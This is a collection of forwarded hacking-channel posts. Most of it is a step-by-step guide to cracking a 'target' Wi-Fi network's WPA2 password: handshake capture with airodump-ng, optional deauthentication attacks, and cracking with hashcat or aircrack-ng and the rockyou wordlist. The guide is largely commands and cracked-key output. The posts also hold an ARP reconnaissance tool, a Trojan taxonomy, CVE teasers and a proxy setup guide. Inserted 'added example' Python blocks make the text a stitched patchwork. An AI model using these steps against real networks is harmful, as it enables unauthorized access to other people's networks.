Forwarded from UNDERCODER
# replace -c and --bssid values with the values of your target network
# -w specifies the directory where we will save the packet capture
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS
D) Now we wait... Once you've captured a handshake, you should see something like [ WPA handshake: bc:d3:c9:ef:d2:67 at the top right of the screen, just right of the current time.
If you are feeling impatient, and are comfortable using an active attack, you can force devices connected to the target network to reconnect by sending malicious deauthentication packets at them. This often results in the capture of a 4-way handshake. See the deauth attack section below for info on this.
E) Once you've captured a handshake, press ctrl-c to quit airodump-ng. You should see a .cap file wherever you told airodump-ng to save the capture (likely called -01.cap). We will use this capture file to crack the network password. I like to rename this file to reflect the network name we are trying to crack:
mv ./-01.cap hackme.cap
Crack the Network Password
E) The final step is to crack the password using the captured handshake. If you have access to a GPU, I highly recommend using hashcat for password cracking. I've created a simple tool that makes hashcat super easy to use called naive-hashcat. If you don't have access to a GPU, there are various online GPU cracking services that you can use, like GPUHASH.me or OnlineHashCrack. You can also try your hand at CPU cracking with Aircrack-ng.
Note that both attack methods below assume a relatively weak user-generated password. Most WPA/WPA2 routers come with strong 12-character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the Probable-Wordlists WPA-length dictionary files.
F) Cracking With naive-hashcat (recommended)
Before we can crack the password using naive-hashcat, we need to convert our .cap file to the equivalent hashcat file format .hccapx. You can do this easily by either uploading the .cap file to https://hashcat.net/cap2hccapx/ or using the cap2hccapx tool directly.
cap2hccapx.bin hackme.cap hackme.hccapx
Next, download and run naive-hashcat:
# download
git clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat
# download the 134MB rockyou dictionary file
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
# crack ! baby ! crack !
# 2500 is the hashcat hash mode for WPA/WPA2
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh
Naive-hashcat uses various dictionary, rule, combination, and mask (smart brute-force) attacks and it can take days or even months to run against mid-strength passwords. The cracked password will be saved to hackme.pot, so check this file periodically. Once you've cracked the password, you should see something like this as the contents of your POT_FILE:
e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet
Where the last two fields separated by : are the network name and password respectively.
If you would like to use hashcat without naive-hashcat see this page for info.
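As an added example (not part of the original tutorial or of naive-hashcat), a small Python parser for the potfile format shown above, so the owner of a network under an authorized test can pull out the entries that belong to their own BSSID and rotate the PSK; the second sample line and its MAC values are constructed, not from the page.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample potfile: the first line is the one shown in the text, the
# second is a made-up entry with a space in the ESSID and a ':' in the password.
SAMPLE_POTFILE = """\
e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet
0123456789abcdef0123456789abcdef:001122334455:66778899aabb:Guest WiFi:pass:word
"""


@dataclass(frozen=True)
class PotEntry:
    digest: str    # hashcat's hex identifier for the handshake
    ap_mac: str    # BSSID, normalized to lowercase colon-separated form
    sta_mac: str   # client station MAC, same form
    essid: str     # network name
    password: str  # recovered pre-shared key


def normalize_mac(mac: str) -> str:
    """Accept 9C:5C:8E:C9:AB:C0, 9c5c8ec9abc0 or 9c-5c-... and return xx:xx:xx:xx:xx:xx."""
    digits = re.sub(r"[^0-9a-fA-F]", "", mac).lower()
    if len(digits) != 12:
        raise ValueError(f"not a MAC address: {mac!r}")
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def parse_pot_line(line: str) -> PotEntry:
    """Parse one mode-2500 potfile line: digest:ap_mac:sta_mac:essid:password.

    The first three fields never contain ':', so they are split off first.
    Neither ESSID nor password is escaped in this format, so a ':' in either is
    ambiguous; this parser takes the first ':' of the remainder as the
    separator, which matches the text's reading of "the last two fields".
    """
    fields = line.rstrip("\r\n").split(":", 3)
    if len(fields) != 4:
        raise ValueError(f"malformed potfile line: {line!r}")
    digest, ap, sta, rest = fields
    essid, sep, password = rest.partition(":")
    if not sep:
        raise ValueError(f"missing password field: {line!r}")
    return PotEntry(digest, normalize_mac(ap), normalize_mac(sta), essid, password)


def parse_potfile(text: str) -> List[PotEntry]:
    """Parse every non-empty line; blank lines are skipped."""
    return [parse_pot_line(ln) for ln in text.splitlines() if ln.strip()]


def entries_for_bssid(entries: List[PotEntry], bssid: str) -> List[PotEntry]:
    """Keep only entries whose AP MAC matches the BSSID given to airodump-ng."""
    wanted = normalize_mac(bssid)
    return [e for e in entries if e.ap_mac == wanted]


if __name__ == "__main__":
    for e in entries_for_bssid(parse_potfile(SAMPLE_POTFILE), "9C:5C:8E:C9:AB:C0"):
        print(f"{e.essid} ({e.ap_mac}): PSK recovered, rotate it -> {e.password!r}")
```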
F) Cracking With Aircrack-ng
Aircrack-ng can be used for very basic dictionary attacks running on your CPU. Before you run the attack you need a wordlist. I recommend using the infamous rockyou dictionary file:
# download the 134MB rockyou dictionary file
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
Note that if the network password is not in the wordlist, you will not crack the password.
# -a2 specifies WPA2, -b is the BSSID, -w is the wordfile
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap
If the password is cracked you will see a KEY FOUND! message in the terminal followed by the plain text version of the network password.
Aircrack-ng 1.2 beta3
[00:01:49] 111040 keys tested (1017.96 k/s)
KEY FOUND! [ hacktheplanet ]
Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
References: github, Ru foro
Forwarded from DailyCVE
Unpatched 360 security desktop has dll hijacking vulnerability (DC: 210-2021)
https://dailycve.com/unpatched-360-security-desktop-has-dll-hijacking-vulnerability
Details:
To help you properly arrange your computer's desktop documentation and configurations, 360 Secure Desktop is a desktop application management program.
In 360 Protected Desktop, there is a DLL hijacking flaw that can be used to run malicious…
Forwarded from DailyCVE
Malwarebytes security breach | CVE
Details:
Malwarebytes is a US software program that provides computers with anti-malware features. The program is designed to defend against malicious software such as bugs, spyware, Trojan horses, worms, dialers, etc. On macOS, Malwarebytes before…
Forwarded from UNDERCODE NEWS
Python Scapy tools developed for LAN tests and advanced reconnaissance:
Installation & run:
1) pip3 install scapy
2) pip3 install netaddr
3) git clone https://github.com/peppelinux/pyLAN-tools.git
4) Usage: arpscan.py [-h] -i I [-r R [R ...]] [-t T]
[-exclude EXCLUDE [EXCLUDE ...]] [-only ONLY [ONLY ...]]
[-debug]
arpscan usage examples
5) Scan only selected peers in the local network reachable on the eth2 interface:
python2 arpscan.py -i eth2 -t 0.01 -only 1 2 3 4 5 6 7 8 9 10 50 150 200 250 251 252 253 254
10.21.0.75 bc:5f:f4:f4:d0:d9 (eth2)
10.21.0.254 d4:ca:6d:e6:6a:d7
6) Scan only selected networks:
python2 arpscan.py -i eth2 -t 0.01 -r 192.168.0.0/24 192.168.1.0/24 172.17.0.0/12
192.168.1.1 08:00:27:7c:f9:41
7) arpscan todo:
- parallelization with a subprocess per -r LAN (performance improvement)
- choose a number of workers, each delegated a subset of addresses (address_pool/num_workers)
- vendor database integration and representation (as netdiscover already does)
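An added example, not from pyLAN-tools or the original post: a Python audit that reads arpscan's "ip mac (iface)" output lines and compares them against a known-host inventory, flagging unknown hosts, hosts whose MAC changed, and one MAC answering for several IPs (a classic ARP-spoofing indicator). The third output line and the inventory are constructed.

```python
import re
from typing import Dict, List, NamedTuple, Optional

# Constructed sample: the first two result lines are the ones shown in the post;
# the third is made up, with the gateway's MAC now also answering for 10.21.0.80.
SAMPLE_OUTPUT = """\
arpscan usage examples
10.21.0.75 bc:5f:f4:f4:d0:d9 (eth2)
10.21.0.254 d4:ca:6d:e6:6a:d7
10.21.0.80 d4:ca:6d:e6:6a:d7 (eth2)
"""

# Constructed inventory: ip -> MAC we expect to answer at that address.
INVENTORY = {
    "10.21.0.75": "BC:5F:F4:F4:D0:D9",
    "10.21.0.254": "00:11:22:33:44:55",
}


class ArpHost(NamedTuple):
    ip: str
    mac: str
    iface: Optional[str]


# One arpscan result line: "<ipv4> <mac>" with an optional " (<iface>)" suffix.
LINE_RE = re.compile(
    r"^\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})"
    r"(?:\s+\((?P<iface>[\w.-]+)\))?\s*$",
    re.IGNORECASE,
)


def parse_arpscan(text: str) -> List[ArpHost]:
    """Return the hosts in arpscan output; lines that are not results are skipped."""
    hosts = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            hosts.append(ArpHost(m["ip"], m["mac"].lower(), m["iface"]))
    return hosts


def audit(hosts: List[ArpHost], inventory: Dict[str, str]) -> Dict[str, list]:
    """Compare a scan with the inventory.

    unknown:     IPs that answered but are not in the inventory
    mac_changed: (ip, expected_mac, seen_mac) where the inventory disagrees
    mac_reused:  (mac, [ips]) where one MAC answered for several IPs
    """
    findings: Dict[str, list] = {"unknown": [], "mac_changed": [], "mac_reused": []}
    ips_by_mac: Dict[str, set] = {}
    for h in hosts:
        expected = inventory.get(h.ip)
        if expected is None:
            findings["unknown"].append(h.ip)
        elif expected.lower() != h.mac:
            findings["mac_changed"].append((h.ip, expected.lower(), h.mac))
        ips_by_mac.setdefault(h.mac, set()).add(h.ip)
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:
            findings["mac_reused"].append((mac, sorted(ips)))
    return findings


if __name__ == "__main__":
    for kind, items in audit(parse_arpscan(SAMPLE_OUTPUT), INVENTORY).items():
        print(kind, items)
```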
Forwarded from DailyCVE
Unpatched binary vulnerability exists in ABC viewing software (DC: 212-2021)
https://dailycve.com/unpatched-binary-vulnerability-exists-abc-viewing-software
Details:
ABC Picture Viewer is a permanently free program for image viewing that turns on hardware acceleration intelligently and supports multiple image formats.
In the ABC picture viewing program, there is a binary flaw which can be abused by attackers…
Forwarded from DailyCVE
Unpatched WPS Office has a denial of service vulnerability (DC 213-2021)
https://dailycve.com/wps-office-has-denial-service-vulnerability-0
Forwarded from UNDERCODE NEWS
Apple removes exclusive features it had illegally inserted into its own software as public sentiment deteriorates.
#Vulnerabilities
Forwarded from UNDERCODE NEWS
Trojan Horse Programs
(1) Blackmail Trojan
This type of Trojan will encrypt, destroy, modify, copy, lock, and delete data. This type of Trojan uses the data in the user's system as a condition of extortion and releases it after the user pays the ransom.
(2) Mail-Finder Trojan
The task of this type of Trojan is to find all email contacts in its target email client. The Trojan can send the list to its creator. In some cases it forwards itself to these contacts in phishing emails without the victim's knowledge, thereby self-propagating.
(3) Fake anti-virus Trojan horse
Such Trojans will send false messages to users informing them that their devices have been infected with viruses. Sometimes complex reports and scan results are used to show a high level of threat, making users panic. Then, the Trojan horse author charges users for virus removal services.
(4) Download Trojan
The purpose of this type of Trojan is to download other malware from the Internet without the device owner's knowledge.
(5) Botnet Trojan
Botnet Trojan horses are used to damage web browsers, infect other devices, force them to join the botnet army, and execute various cyber crimes.
(6) Backdoor/remote access Trojan
This type of Trojan allows cybercriminals to remotely access and control the compromised device, for example to:
Access and modify files;
Restart the target system;
Install or uninstall other software;
Send and receive information with other connected IoT devices;
Get many other similar privileges.
(7) Spy Trojan
This type of Trojan, also known as spyware, monitors user behavior, such as surfing the Internet and what users type on websites and devices (such as personal information, financial data, login credentials, etc.). This information will then be used to perform identity theft crimes, financial fraud or ransomware attacks.
Forwarded from DailyCVE
Joomla! Cross-site scripting vulnerability:
https://dailycve.com/joomla-cross-site-scripting-vulnerability
Details:
Joomla! is a world-renowned content management system. It is a software framework developed in PHP with a MySQL database, and it runs on different platforms, including Linux, Windows, and macOS.
Joomla! 3.1.0…
Forwarded from DailyCVE
Unpatched Awbs Advanced Webhost Billing System cross-site request forgery vulnerability:
https://dailycve.com/unpatched-awbs-advanced-webhost-billing-system-cross-site-request-forgery-vulnerability
Details:
Awbs Advanced Webhost Billing System is a PHP-based network billing management system, used in the United States to handle Awbs hosts. The platform can offer commercial facilities for web hosting and/or domain name registration, and can provide…
Forwarded from UNDERCODE NEWS
A German privacy agency reported that an online laptop and electronics store was fined EUR 10.4 million for monitoring its staff in breach of the GDPR.
#International
Forwarded from UNDERCODE NEWS
Configuring proxy settings in CentOS 8/7, RHEL 8/7 and Fedora:
1) Configure system-wide proxy settings in the desktop interface
For users using a desktop environment on Fedora / CentOS and RHEL Linux, changes can be made in the system control panel.
Go to Settings > Network > Network Proxy
2) Select "Manual" to enter proxy settings.
3) Fill in the proxy values for http, https and ftp.
If you have a SOCKS proxy, also set it accordingly.
After saving the changes, the system will automatically apply the new parameters.
4) Proxy in Firefox browser
If you have a Firefox browser, you need to update your proxy settings under Settings> Network Settings> Manual Proxy Settings.
5) Configure system-wide proxy settings in CLI
We will add a shell script file to /etc/profile.d/proxy.sh.
This will ensure that the settings are applied to all logged-in users.
sudo vi /etc/profile
Add proxy settings.
# set proxy config via profile.d - should apply for all users
#
PROXY_URL="http://10.10.1.10:8080/"
export http_proxy="$PROXY_URL"
export https_proxy="$PROXY_URL"
export ftp_proxy="$PROXY_URL"
export no_proxy="127.0.0.1,localhost"
# For curl
export HTTP_PROXY="$PROXY_URL"
export HTTPS_PROXY="$PROXY_URL"
export FTP_PROXY="$PROXY_URL"
export NO_PROXY="127.0.0.1,localhost"
Where:
10.10.1.10 - proxy server ip, can be replaced with hostname
8080 - proxy server port
If authentication is required, the syntax is:
http://username:password@proxyserver:proxyport/
then run:
$ source /etc/profile
Confirm :
$ env | grep -i proxy
Forwarded from DailyCVE
Eclipse Hawkbit access control error vulnerability:
https://dailycve.com/eclipse-hawkbit-access-control-error-vulnerability
Details:
Eclipse hawkBit is an Eclipse Foundation domain-independent back-end application. This product is used for rolling out software updates to constrained edge devices.
Forwarded from DailyCVE
DELL EMC Avamar Server SQL injection vulnerability (DC: 217-2021):
https://dailycve.com/dell-emc-avamar-server-sql-injection-vulnerability
Details:
Dell EMC Avamar is a series of fully virtualized server backup and recovery tools from Dell EMC.
There are SQL injection bugs in DELL EMC Avamar Server 19.1, 19.2, and 19.3. This vulnerability can be used by unauthenticated remote…